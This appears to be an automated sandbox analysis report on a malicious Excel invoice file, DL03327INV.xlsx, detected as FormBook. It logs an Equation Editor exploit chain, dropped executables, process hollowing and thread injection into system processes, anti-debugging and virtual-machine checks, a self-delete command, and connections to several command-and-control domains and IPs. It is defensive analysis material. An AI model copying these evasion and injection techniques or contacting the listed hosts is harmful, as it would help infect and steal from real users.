Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\zjary\jjvucn\mxni\b98fa234680046ddacdf27145f9ff7b1\qjcbwv\ygyntjah\Release\ygyntjah.pdb source: vbc.exe, 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp, yldnat.exe, 00000005.00000000.976220140.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, yldnat.exe, 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, yldnat.exe, 00000006.00000000.982290199.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1176125071.0000000002397000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175572763.0000000000352000.00000004.00000020.00020000.00000000.sdmp, nss8A2D.tmp.4.dr, yldnat.exe.4.dr
Source:	Binary string: wntdll.pdb source: yldnat.exe, yldnat.exe, 00000006.00000003.985070971.00000000006C0000.00000004.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032618043.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000003.983271572.0000000000560000.00000004.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000003.1032134115.0000000000780000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175921231.0000000002010000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.1033412733.0000000001D00000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wuapp.pdb source: yldnat.exe, 00000006.00000002.1031989955.0000000000030000.00000040.10000000.00040000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032320172.0000000000484000.00000004.00000020.00020000.00000000.sdmp

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_013B2445 push ecx; ret	5_2_013B2458
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041E9FF push dword ptr [2E33947Ah]; ret	6_2_0041E9FB
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041D5D5 push eax; ret	6_2_0041D628
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041D622 push eax; ret	6_2_0041D628
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041D62B push eax; ret	6_2_0041D692
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041D68C push eax; ret	6_2_0041D692
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041E79A push dword ptr [2E33947Ah]; ret	6_2_0041E9FB
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_013B2445 push ecx; ret	6_2_013B2458
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EADFA1 push ecx; ret	8_2_01EADFB4
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012F1B1 push esi; retf	8_2_0012F1B2
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012D5D5 push eax; ret	8_2_0012D628
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012D622 push eax; ret	8_2_0012D628
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012D62B push eax; ret	8_2_0012D692
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012D68C push eax; ret	8_2_0012D692
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012E79A push dword ptr [2E33947Ah]; ret	8_2_0012E9FB
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012E9FF push dword ptr [2E33947Ah]; ret	8_2_0012E9FB

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\yldnat.exe	Jump to dropped file

Contains functionality to download and launch executables

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036D04FF URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_036D04FF

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

5_2_013B1890

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	RDTSC instruction interceptor: First address: 0000000000408BB4 second address: 0000000000408BBA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	RDTSC instruction interceptor: First address: 0000000000408F3E second address: 0000000000408F44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wuapp.exe	RDTSC instruction interceptor: First address: 0000000000118BB4 second address: 0000000000118BBA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wuapp.exe	RDTSC instruction interceptor: First address: 0000000000118F3E second address: 0000000000118F44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1500

Thread sleep time: -300000s >= -30000s

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wuapp.exe	Last function: Thread delayed

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Code function: 6_2_00408E70 rdtsc

6_2_00408E70

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405D7A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004069A4 FindFirstFileW,FindClose,	4_2_004069A4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node
Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	API call chain: ExitProcess graph end node

Source: explorer.exe, 00000007.00000000.1074423275.00000000043F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: EQNEDT32.EXE, 00000002.00000002.971587463.000000000069F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m
Source: explorer.exe, 00000007.00000000.1074423275.00000000043F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.995482654.0000000000964000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&00000000
Source: explorer.exe, 00000007.00000000.1002709372.000000000037B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
Source: explorer.exe, 00000007.00000000.995370512.0000000004423000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0e
Source: explorer.exe, 00000007.00000000.995128220.000000000434F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
Source: explorer.exe, 00000007.00000000.1074423275.00000000043F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
Source: explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Code function: 5_2_013B1D2C _memset,IsDebuggerPresent,

5_2_013B1D2C

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

5_2_013B558A

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Code function: 5_2_013B1D17 GetProcessHeap,

5_2_013B1D17

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Code function: 6_2_00408E70 rdtsc

6_2_00408E70

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Process token adjusted: Debug			Jump to behavior

Contains functionality to read the PEB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D0559 mov edx, dword ptr fs:[00000030h]	2_2_036D0559
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_001103F8 mov eax, dword ptr fs:[00000030h]	5_2_001103F8
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_0011061D mov eax, dword ptr fs:[00000030h]	5_2_0011061D
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_001106F7 mov eax, dword ptr fs:[00000030h]	5_2_001106F7
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_00110736 mov eax, dword ptr fs:[00000030h]	5_2_00110736
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_00110772 mov eax, dword ptr fs:[00000030h]	5_2_00110772
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008726F8 mov eax, dword ptr fs:[00000030h]	6_2_008726F8
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EB26F8 mov eax, dword ptr fs:[00000030h]	8_2_01EB26F8

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Code function: 6_2_0040A0E0 LdrLoadDll,

6_2_0040A0E0

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_013B439B SetUnhandledExceptionFilter,	5_2_013B439B
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_013B43CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_013B43CC
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_013B439B SetUnhandledExceptionFilter,	6_2_013B439B
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_013B43CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_013B43CC

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 23.81.214.26 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.arjimni.com
Source: C:\Windows\explorer.exe	Domain query: www.tw-life.net
Source: C:\Windows\explorer.exe	Domain query: www.contractornurd.com
Source: C:\Windows\explorer.exe	Domain query: www.yiwanggkm.com
Source: C:\Windows\explorer.exe	Network Connect: 164.155.217.57 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.212 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Section unmapped: C:\Windows\SysWOW64\wuapp.exe base address: 8E0000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Memory written: C:\Users\user\AppData\Local\Temp\yldnat.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Thread register set: target process: 1860			Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Thread register set: target process: 1860			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna	Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\yldnat.exe"	Jump to behavior

Source: explorer.exe, 00000007.00000000.1003147804.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.988533014.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1014113528.0000000000830000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1003147804.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.988533014.0000000000830000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.1003147804.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.988533014.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1014113528.0000000000830000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager<

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Code function: 5_2_013B3283 cpuid

5_2_013B3283

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Code function: 5_2_013B3EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

5_2_013B3EC8

Source: C:\Users\Public\vbc.exe

4_2_00403646

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Windows Analysis Report
DL03327INV.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	626601
Product:	CloudBasic
Start time:	15:18:09
Start date:	14.05.2022
Sample:	DL03327INV.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	5b4a67ac532a5d8900b815144f0fb845
SHA1:	6da306004e084780e9f57f3702a5ec22e72fff6c
SHA256:	98fc7157dafde651c3ab515663e3a91f034b49175e2e2495c00576c4b8e9e96d
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	DE76EF6A11A63EFC00B0303888BC0B7F	7AB24456A49F6B61BC54D20A4D9C0B84F3AE696B	FC6EBE8BC215A292BB3DF340A84350CEB2BE7187EFC8E10381235CFA8D82F734
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\21AA51C5.wmf	ms-windows metafont .wmf	1A4FF280B6D51A6ED16C3720AF1CD6EE	277878BEF42DAC8BB79E15D3229D7EEC37CE22D9	E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5042D1B.wmf	ms-windows metafont .wmf	1A4FF280B6D51A6ED16C3720AF1CD6EE	277878BEF42DAC8BB79E15D3229D7EEC37CE22D9	E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\52D20C60.wmf	ms-windows metafont .wmf	30935B0D56A69E2E57355F8033ADF98B	5F7C13E36023A1B3B3DAF030291C02631347C2AB	077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
